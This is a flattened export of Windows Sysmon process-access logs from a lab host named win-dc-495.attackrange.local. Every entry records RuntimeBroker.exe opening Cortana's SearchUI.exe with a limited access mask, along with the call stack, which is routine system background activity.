13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 